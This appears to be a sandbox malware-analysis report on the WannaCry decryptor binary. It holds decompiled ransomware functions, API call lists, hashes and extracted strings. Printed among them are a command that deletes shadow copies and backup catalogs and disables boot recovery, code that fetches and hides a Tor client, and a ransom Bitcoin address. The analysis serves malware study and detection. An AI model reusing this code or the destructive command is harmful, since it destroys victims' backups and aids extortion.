					asm("sbb eax, 0xffffffff");
					goto L14;
				}
				L37:
				E00407E80();
				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
				E00406F80(_t90, _t201);
				E00406C20(_t90);
				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
				 *0x42189c = _t90;
				return 1;
			}











































                                  0x004064d0
                                  0x004064da
                                  0x004064dc
                                  0x004064f9
                                  0x0040650d
                                  0x00406511
                                  0x00406516
                                  0x0040651b
                                  0x0040651d
                                  0x00406527
                                  0x00406530
                                  0x00406532
                                  0x00406540
                                  0x00406541
                                  0x00406554
                                  0x00406556
                                  0x0040655b
                                  0x00406564
                                  0x00406566
                                  0x00406569
                                  0x00406569
                                  0x00406571
                                  0x00406571
                                  0x00406577
                                  0x00406580
                                  0x00406585
                                  0x0040658a
                                  0x00406593
                                  0x0040659d
                                  0x004065ab
                                  0x004065bb
                                  0x004065bd
                                  0x004065c7
                                  0x004065d1
                                  0x004065da
                                  0x004065e0
                                  0x004065e5
                                  0x004065e5
                                  0x004065e8
                                  0x004065fa
                                  0x00406600
                                  0x00406609
                                  0x0040660f
                                  0x00406615
                                  0x0040661e
                                  0x00406621
                                  0x00406621
                                  0x00406625
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662d
                                  0x00406645
                                  0x00406645
                                  0x0040662f
                                  0x0040662f
                                  0x00406632
                                  0x00406635
                                  0x00406639
                                  0x00000000
                                  0x0040663b
                                  0x0040663b
                                  0x0040663e
                                  0x00406643
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406639
                                  0x0040664e
                                  0x00406650
                                  0x00406654
                                  0x0040665b
                                  0x0040665b
                                  0x00406661
                                  0x0040666a
                                  0x0040666d
                                  0x0040666d
                                  0x00406671
                                  0x00406675
                                  0x00000000
                                  0x00000000
                                  0x00406679
                                  0x00406691
                                  0x00406691
                                  0x0040667b
                                  0x0040667b
                                  0x0040667e
                                  0x00406681
                                  0x00406685
                                  0x00000000
                                  0x00406687
                                  0x00406687
                                  0x0040668a
                                  0x0040668f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040668f
                                  0x00406685
                                  0x0040669a
                                  0x0040669c
                                  0x004066a0
                                  0x004066a7
                                  0x004066a7
                                  0x004066ad
                                  0x004066b6
                                  0x004066b9
                                  0x004066b9
                                  0x004066bd
                                  0x004066c1
                                  0x00000000
                                  0x00000000
                                  0x004066c5
                                  0x004066dd
                                  0x004066dd
                                  0x004066c7
                                  0x004066c7
                                  0x004066ca
                                  0x004066cd
                                  0x004066d1
                                  0x00000000
                                  0x004066d3
                                  0x004066d3
                                  0x004066d6
                                  0x004066db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066db
                                  0x004066d1
                                  0x004066e6
                                  0x004066e8
                                  0x004066f3
                                  0x0040671a
                                  0x0040671c
                                  0x00406721
                                  0x00406727
                                  0x0040672b
                                  0x00406736
                                  0x0040675b
                                  0x0040675c
                                  0x0040676a
                                  0x0040677c
                                  0x00406738
                                  0x00406746
                                  0x0040674b
                                  0x00406786
                                  0x00406786
                                  0x00000000
                                  0x004066e8
                                  0x004066e1
                                  0x004066e3
                                  0x00000000
                                  0x004066e3
                                  0x00406695
                                  0x00406697
                                  0x00000000
                                  0x00406697
                                  0x00406649
                                  0x0040664b
                                  0x00000000
                                  0x0040664b
                                  0x0040678c
                                  0x0040678e
                                  0x0040679c
                                  0x004067a4
                                  0x004067ab
                                  0x004067c6
                                  0x004067d8
                                  0x004067dc
                                  0x004067ef

                                  APIs
                                  • #4710.MFC42 ref: 004064DC
                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                    • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                    • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                    • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                    • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                    • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                  • strrchr.MSVCRT ref: 00406554
                                  • strrchr.MSVCRT ref: 00406564
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                  • time.MSVCRT ref: 004065D1
                                  • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                  • __p___argv.MSVCRT ref: 0040661A
                                  • ExitProcess.KERNEL32 ref: 0040665B
                                  • __p___argv.MSVCRT ref: 00406666
                                  • ExitProcess.KERNEL32 ref: 004066A7
                                  • __p___argv.MSVCRT ref: 004066B2
                                  • Sleep.KERNEL32(00002710), ref: 004066F3
                                  • sprintf.MSVCRT ref: 0040676A
                                  • ExitProcess.KERNEL32 ref: 00406786
                                  • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                  • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                  Strings
                                  • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                  • Wana Decrypt0r 2.0, xrefs: 00406796
                                  • cmd.exe, xrefs: 0040671C
                                  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                  • %s %s, xrefs: 00406764
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                  • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                  • API String ID: 623806192-606506946
                                  • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                  • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004060E0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				struct HINSTANCE__* _t82;
				struct HICON__* _t83;
				intOrPtr _t119;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E00413E0B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(__ecx);
				_t119 = __ecx;
				_push(_a4);
				_push(0x66);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
				_v12 = 2;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
				_v12 = 3;
				E004085C0(__ecx + 0x120);
				_v12 = 4;
				E004085C0(__ecx + 0x1a4);
				_v12 = 5;
				E00404090(__ecx + 0x228);
				_v12 = 6;
				E00404090(__ecx + 0x290);
				_v12 = 7;
				E00404090(__ecx + 0x2f8);
				_v12 = 8;
				E00404090(__ecx + 0x360);
				_v12 = 9;
				E00405000(__ecx + 0x3c8);
				_v12 = 0xa;
				E00405000(__ecx + 0x444);
				_v12 = 0xb;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
				_v12 = 0xc;
				L00412DA6();
				_v12 = 0xd;
				L00412DA6();
				_v12 = 0xe;
				L00412DA6();
				_v12 = 0xf;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x834)) = 0;
				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x844)) = 0;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x854)) = 0;
				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x864)) = 0;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x874)) = 0;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x884)) = 0;
				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
				_v12 = 0x1b;
				_t82 = E00407640(__ecx + 0x888);
				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
				 *((intOrPtr*)(__ecx + 0x894)) = 0;
				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
				_push(0x421798);
				_v12 = 0x1d;
				 *((intOrPtr*)(__ecx)) = 0x4163a0;
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				L00412E5A();
				_push(0x80);
				_push(0xe);
				L00412F2C();
				_t83 = LoadIconA(_t82, 0x80); // executed
				_push(0x421798);
				 *(_t119 + 0x82c) = _t83;
				 *((intOrPtr*)(_t119 + 0x824)) = 0;
				 *((intOrPtr*)(_t119 + 0x828)) = 0;
				 *((intOrPtr*)(_t119 + 0x818)) = 0;
				L00412DA0();
				 *((intOrPtr*)(_t119 + 0x820)) = 0;
				 *[fs:0x0] = _v44;
				return _t119;
			}










                                  0x004060e0
                                  0x004060e2
                                  0x004060ed
                                  0x004060ee
                                  0x004060f5
                                  0x004060fe
                                  0x00406100
                                  0x00406101
                                  0x00406103
                                  0x00406107
                                  0x00406113
                                  0x00406117
                                  0x0040611c
                                  0x00406128
                                  0x0040612f
                                  0x00406134
                                  0x00406140
                                  0x00406147
                                  0x0040614c
                                  0x00406158
                                  0x0040615d
                                  0x00406168
                                  0x0040616d
                                  0x00406178
                                  0x0040617d
                                  0x00406188
                                  0x0040618d
                                  0x00406198
                                  0x0040619d
                                  0x004061a8
                                  0x004061ad
                                  0x004061b8
                                  0x004061bd
                                  0x004061c8
                                  0x004061cd
                                  0x004061d8
                                  0x004061df
                                  0x004061e4
                                  0x004061f0
                                  0x004061f7
                                  0x00406202
                                  0x00406209
                                  0x00406214
                                  0x00406219
                                  0x00406224
                                  0x00406229
                                  0x00406233
                                  0x00406239
                                  0x0040623f
                                  0x00406245
                                  0x0040624b
                                  0x00406251
                                  0x00406257
                                  0x0040625d
                                  0x00406263
                                  0x00406269
                                  0x0040626f
                                  0x00406275
                                  0x0040627b
                                  0x00406281
                                  0x00406287
                                  0x0040628d
                                  0x00406293
                                  0x00406299
                                  0x0040629f
                                  0x004062a5
                                  0x004062ab
                                  0x004062b1
                                  0x004062c1
                                  0x004062c6
                                  0x004062cb
                                  0x004062d5
                                  0x004062db
                                  0x004062e5
                                  0x004062ec
                                  0x004062f1
                                  0x004062f7
                                  0x004062fc
                                  0x00406303
                                  0x00406308
                                  0x00406313
                                  0x00406318
                                  0x0040631d
                                  0x00406322
                                  0x00406329
                                  0x0040632f
                                  0x00406335
                                  0x00406340
                                  0x00406346
                                  0x0040634c
                                  0x00406352
                                  0x00406358
                                  0x00406361
                                  0x0040636d
                                  0x00406377

                                  APIs
                                  • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                  • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                  • #567.MFC42(00000066,00000000), ref: 0040612F
                                  • #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                    • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                    • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                    • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                    • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                    • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                    • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                    • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                    • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                    • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                    • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                  • #567.MFC42(00000066,00000000), ref: 004061DF
                                  • #540.MFC42(00000066,00000000), ref: 004061F7
                                  • #540.MFC42(00000066,00000000), ref: 00406209
                                  • #540.MFC42(00000066,00000000), ref: 00406219
                                  • #540.MFC42(00000066,00000000), ref: 00406229
                                  • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                  • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                  • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                  • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                  • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                  • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                  • #860.MFC42(00421798), ref: 00406358
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                  • String ID: 0ZA$0ZA$0ZA$DZA
                                  • API String ID: 3237077636-3729005435
                                  • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                  • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B840 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 138synchronizationprocessfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 85%
                                  			E0040B840() {
				void _v519;
				char _v520;
				void _v1039;
				char _v1040;
				struct _STARTUPINFOA _v1108;
				struct _PROCESS_INFORMATION _v1124;
				char _t29;
				long _t33;
				int _t37;
				void* _t46;
				char _t47;
				long _t51;
				void* _t55;
				void* _t56;
				void* _t84;
				void* _t86;

				_t29 =  *0x421798; // 0x0
				_v1040 = _t29;
				memset( &_v1039, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
				_t84 =  &_v1124 + 0x20;
				_t33 = GetFileAttributesA( &_v1040); // executed
				if(_t33 != 0xffffffff) {
					L8:
					_v1108.cb = 0x44;
					_v1124.hProcess = 0;
					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
					_v1124.hThread = 0;
					_v1124.dwProcessId = 0;
					_v1124.dwThreadId = 0;
					_v1108.wShowWindow = 0;
					_v1108.dwFlags = 1;
					_t37 = CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124); // executed
					if(_t37 != 0) {
						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
							WaitForSingleObject(_v1124.hProcess, 0x7530);
						}
						CloseHandle(_v1124);
						CloseHandle(_v1124.hThread);
						return 1;
					} else {
						return 0;
					}
				} else {
					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
					_t86 = _t84 + 0xc;
					if(_t46 != 0) {
						L5:
						_t47 =  *0x421798; // 0x0
						_v520 = _t47;
						memset( &_v519, 0, 0x81 << 2);
						asm("stosw");
						asm("stosb");
						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
						_t84 = _t86 + 0x20;
						_t51 = GetFileAttributesA( &_v520); // executed
						if(_t51 != 0xffffffff) {
							CopyFileA( &_v520,  &_v1040, 0); // executed
							goto L8;
						} else {
							return 0;
						}
					} else {
						_push(0);
						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
						_t86 = _t86 + 0xc;
						if(_t55 != 0) {
							goto L5;
						} else {
							_push(0);
							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
							_t86 = _t86 + 0xc;
							if(_t56 != 0) {
								goto L5;
							} else {
								return _t56;
							}
						}
					}
				}
			}



















                                  0x0040b846
                                  0x0040b84d
                                  0x0040b861
                                  0x0040b863
                                  0x0040b879
                                  0x0040b87a
                                  0x0040b885
                                  0x0040b88d
                                  0x0040b892
                                  0x0040b95b
                                  0x0040b966
                                  0x0040b970
                                  0x0040b974
                                  0x0040b976
                                  0x0040b982
                                  0x0040b991
                                  0x0040b995
                                  0x0040b99f
                                  0x0040b9aa
                                  0x0040b9b2
                                  0x0040b9d6
                                  0x0040b9e2
                                  0x0040b9e2
                                  0x0040b9ef
                                  0x0040b9f6
                                  0x0040ba02
                                  0x0040b9b5
                                  0x0040b9be
                                  0x0040b9be
                                  0x0040b898
                                  0x0040b8a4
                                  0x0040b8a9
                                  0x0040b8ae
                                  0x0040b8e9
                                  0x0040b8e9
                                  0x0040b8f3
                                  0x0040b908
                                  0x0040b90a
                                  0x0040b923
                                  0x0040b924
                                  0x0040b929
                                  0x0040b934
                                  0x0040b939
                                  0x0040b955
                                  0x00000000
                                  0x0040b93c
                                  0x0040b945
                                  0x0040b945
                                  0x0040b8b0
                                  0x0040b8b0
                                  0x0040b8bc
                                  0x0040b8c1
                                  0x0040b8c6
                                  0x00000000
                                  0x0040b8c8
                                  0x0040b8c8
                                  0x0040b8d4
                                  0x0040b8d9
                                  0x0040b8de
                                  0x00000000
                                  0x0040b8e8
                                  0x0040b8e8
                                  0x0040b8e8
                                  0x0040b8de
                                  0x0040b8c6
                                  0x0040b8ae

                                  APIs
                                  • sprintf.MSVCRT ref: 0040B87A
                                  • GetFileAttributesA.KERNELBASE(?,?,?,?,00000000,?), ref: 0040B88D
                                  • CreateProcessA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  • sprintf.MSVCRT ref: 0040B924
                                  • GetFileAttributesA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                    • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000428), ref: 0040B793
                                    • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                    • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                    • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                  • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                  • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                  • String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
                                  • API String ID: 4284242699-3937372533
                                  • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                  • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E00405A60(void* __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v140;
				void* _v928;
				void* _v932;
				void* _v936;
				void* _v1000;
				char _v1124;
				char _v1248;
				char _v1352;
				char _v1456;
				char _v1560;
				char _v1664;
				char _v1796;
				char _v1928;
				void* _v1992;
				void* _v2056;
				void* _v2120;
				char _v2212;
				char _v2216;
				intOrPtr _t144;

				_push(0xffffffff);
				_push(E00413A76);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t144;
				E0040B620(L"Wana Decrypt0r 2.0", 1);
				_push(0);
				L00412F08();
				L00412F02();
				L00412EFC();
				E004060E0( &_v2212, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
				L00412B72(); // executed
				_v8 = 0x1d;
				_v24 = 0x415a30;
				E00403F20( &_v24);
				_v8 = 0x1c;
				_v32 = 0x415a30;
				E00403F20( &_v32);
				_v8 = 0x1b;
				_v40 = 0x415a30;
				E00403F20( &_v40);
				_v8 = 0x1a;
				_v48 = 0x415a44;
				E00403F20( &_v48);
				_v8 = 0x19;
				_v56 = 0x415a44;
				E00403F20( &_v56);
				_v8 = 0x18;
				_v64 = 0x415a44;
				E00403F20( &_v64);
				_v8 = 0x17;
				_v72 = 0x415a44;
				E00403F20( &_v72);
				_v8 = 0x16;
				_v80 = 0x415a44;
				E00403F20( &_v80);
				_v8 = 0x15;
				_v88 = 0x415a44;
				E00403F20( &_v88);
				_v8 = 0x14;
				_v96 = 0x415a44;
				E00403F20( &_v96);
				_v8 = 0x13;
				_v104 = 0x415a44;
				E00403F20( &_v104);
				_v8 = 0x12;
				E00403F90( &_v112);
				_v8 = 0x11;
				E00403F90( &_v120);
				_v8 = 0x10;
				L00412CC2();
				_v8 = 0xf;
				L00412CC2();
				_v8 = 0xe;
				L00412CC2();
				_v8 = 0xd;
				L00412CC2();
				_v8 = 0xc;
				L00412EF6();
				_v8 = 0xb;
				E004050A0( &_v1124);
				_v8 = 0xa;
				E004050A0( &_v1248);
				_v8 = 9;
				E00404170( &_v1352);
				_v8 = 8;
				E00404170( &_v1456);
				_v8 = 7;
				E00404170( &_v1560);
				_v8 = 6;
				E00404170( &_v1664);
				_v8 = 5;
				E00405D90( &_v1796);
				_v8 = 4;
				E00405D90( &_v1928);
				_v8 = 3;
				L00412EF0();
				_v8 = 2;
				L00412EF0();
				_v8 = 1;
				L00412D4C();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return 0;
			}





































                                  0x00405a60
                                  0x00405a62
                                  0x00405a6d
                                  0x00405a6e
                                  0x00405a85
                                  0x00405a8a
                                  0x00405a8c
                                  0x00405a96
                                  0x00405a9b
                                  0x00405aa6
                                  0x00405ab3
                                  0x00405abe
                                  0x00405ac1
                                  0x00405ad2
                                  0x00405add
                                  0x00405ae4
                                  0x00405af0
                                  0x00405af8
                                  0x00405aff
                                  0x00405b0b
                                  0x00405b13
                                  0x00405b1a
                                  0x00405b2b
                                  0x00405b33
                                  0x00405b3a
                                  0x00405b46
                                  0x00405b4e
                                  0x00405b55
                                  0x00405b61
                                  0x00405b69
                                  0x00405b70
                                  0x00405b7c
                                  0x00405b84
                                  0x00405b8b
                                  0x00405b90
                                  0x00405b98
                                  0x00405ba6
                                  0x00405bb2
                                  0x00405bba
                                  0x00405bc1
                                  0x00405bcd
                                  0x00405bd5
                                  0x00405bdc
                                  0x00405be8
                                  0x00405bf0
                                  0x00405bf7
                                  0x00405c03
                                  0x00405c0b
                                  0x00405c17
                                  0x00405c1f
                                  0x00405c2b
                                  0x00405c33
                                  0x00405c3f
                                  0x00405c47
                                  0x00405c53
                                  0x00405c5b
                                  0x00405c67
                                  0x00405c6f
